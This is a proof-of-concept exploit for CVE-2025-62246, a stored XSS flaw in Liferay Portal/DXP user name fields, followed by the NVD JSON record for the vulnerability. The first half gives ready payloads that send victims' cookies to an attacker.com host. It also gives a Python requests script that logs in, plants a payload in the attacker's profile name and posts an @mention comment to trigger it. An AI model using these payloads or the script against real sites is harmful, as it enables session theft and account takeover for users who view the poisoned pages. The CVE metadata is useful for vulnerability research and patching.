CVE-2025-62246

<!-- CVE-2025-62246 - Liferay Portal/DXP Stored XSS via User Name Fields --> <!-- Attacker modifies their profile name fields with malicious payloads --> <!-- Step 1: Set malicious payload in user profile name fields --> <!-- First Name payload example --> <img src=x onerror="alert('XSS via First Name');document.location='https://attacker.com/steal?c='+document.cookie"> <!-- Middle Name payload example --> <svg/onload="fetch('https://attacker.com/log?data='+btoa(document.cookie))"> <!-- Last Name payload example --> <script>new Image().src='https://attacker.com/x?'+document.cookie;</script> <!-- Step 2: Trigger the XSS by mentioning the malicious user --> <!-- In a blog comment, wiki page, or message board, use @mention to reference the attacker --> <!-- Example: @[userId] or @username in any widget that supports mentions --> <!-- Step 3: When victim views the page containing the mention, XSS fires --> <!-- The malicious code executes in the victim's browser context --> <!-- Automated exploitation example using Python requests --> import requests TARGET_URL = "https://liferay.example.com" USERNAME = "attacker" PASSWORD = "password123" session = requests.Session() # Login login_data = { "_com_liferay_login_web_portlet_LoginPortlet_formDate": "", "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false", "_com_liferay_login_web_portlet_LoginPortlet_redirect": "", "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false", "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME, "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD, "p_auth": "" } session.post(f"{TARGET_URL}/web/guest/home", data=login_data) # Update profile with XSS payload in name fields profile_data = { "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_mvcPath": "/users_admin/edit_user.jsp", "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_firstName": "<img src=x onerror=alert(1)>", "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_middleName": "", "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_lastName": "Malicious" } session.post(f"{TARGET_URL}/group/control_panel/manage", data=profile_data) # Post a comment with @mention to trigger the XSS comment_data = { "_com_liferay_message_boards_web_portlet_MBPortlet_cmd": "addMessage", "_com_liferay_message_boards_web_portlet_MBPortlet_inputSubject": "Hello", "_com_liferay_message_boards_web_portlet_MBPortlet_inputBody": "Hey @attacker check this out!", "_com_liferay_message_boards_web_portlet_MBPortlet_postReply": "true" } session.post(f"{TARGET_URL}/message-boards", data=comment_data)

{"cve": {"id": "CVE-2025-62246", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:35.260", "lastModified": "2025-12-12T20:43:47.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a user’s first, middle or last name text field to (1) page comments widget, (2) blog entry comments, (3) document and media document comments, (4) message board messages, (5) wiki page comments or (6) other widgets/apps that supports mentions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.0", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "CEA3CAD9-1E84-4DF9-A232-997BA0A2C654"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62246", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}